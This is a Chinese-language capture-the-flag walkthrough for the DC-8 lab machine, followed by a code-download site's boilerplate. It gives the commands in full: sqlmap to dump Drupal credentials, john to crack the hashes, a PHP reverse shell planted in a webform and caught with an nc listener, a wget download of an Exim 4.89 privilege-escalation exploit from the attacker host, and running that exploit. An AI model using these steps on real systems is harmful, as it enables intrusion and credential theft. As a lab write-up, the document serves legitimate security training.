靶机DC-8

靶机下载 靶机下载地址:​​https://www.five86.com/dc-8.html​​ 信息搜集 靶机设置NAT模式,nmap扫描网段 nmap -sn 192.168.74.0/24 判断出目标主机IP后扫描主机 nmap -A 192.168.74.132 SQL注入 访问ip看下站点,看到左侧有个列表 看到url有?nid=2,试下sql注入 随便试个,出现报错,直接sqlmap跑下 上来就是sqlmap四连 sqlmap -u http://192.168.74.132/?nid=2 --dbs 获取数据库名 sqlmap -u http://192.168.74.132/?nid=2 --tables -D d7db 获取d7db数据库中的表名 sqlmap -u http://192.168.74.132/?nid=2 --columns -T users -D d7db 获取d7db数据库中user表的内容 sqlmap -u http://192.168.74.132/?nid=2 --dump -C "name,pass" -T users -D d7db 获取d7db数据库中users表中name,pass字段的值 根据DC3的经验,直接用john进行解密 把要解密的密文写到txt文件中 得到turtle 反弹shell 百度查下drupal后台路径 访问​​http://your-ip/user​​,登录john/turtle 然后编辑模板,准备写shell回连 发现只有Contact US界面可以编辑 写入点:Home>Contact Us>WebForm>Form settings 记得先设置php代码,写上回连语句,保存在页面最下方 kali上设置监听端口 nc -lvp 666 然后退出登录,在Contact Us界面填写信息,随便填 提交后回连成功 获取交互模式shell python -c 'import pty;pty.spawn("/bin/bash")' 提权 试了下sudo -l 没东西,再看下哪些指令有root权限 find / -perm -u=s -type f 2>/dev/null 用searchsploit搜索下exim相关信息 searchsploit exim 再看下exim的版本,4.89 找到对应版本的提权脚本进行利用 这个46996.sh文件在/usr/share/exploitdb/exploits/linux/local下 靶机中tmp目录权限较高,可以把文件上传到这里 kali有web服务的前提下,把脚本文件放到/var/www/html路径下 进入靶机tmp目录下 在tmp目录下输入wget http://192.168.74.129/46996.sh 提升脚本权限 chmod 777 46996.sh ./46996.sh 报错,搜下bad interpreter,编码格式问题 附链接:​​https://blog.csdn.net/weixin_44371151/article/details/88394275​​ 输入sed -i "s/\r//" filename即可 sed -i "s/\r//" 46996.sh 貌似是成功了,但是好像还没权限 看了下脚本文件,发现还差一步 ./46996.sh -m setuid 还是进不了root目录 再试下第二种方法 ./46996.sh -m netcat 拿到flag~

提供优质的网站源码大全,小程序、APP、H5、支付、游戏、区块链、商城、直播、影音、小说、公众号等源码下载。
易搜网络技术公司 » 靶机DC-8
赞助VIP 享更多特权,建议使用 QQ 登录
喜欢我嘛?喜欢就按“ctrl+D”收藏我吧!♡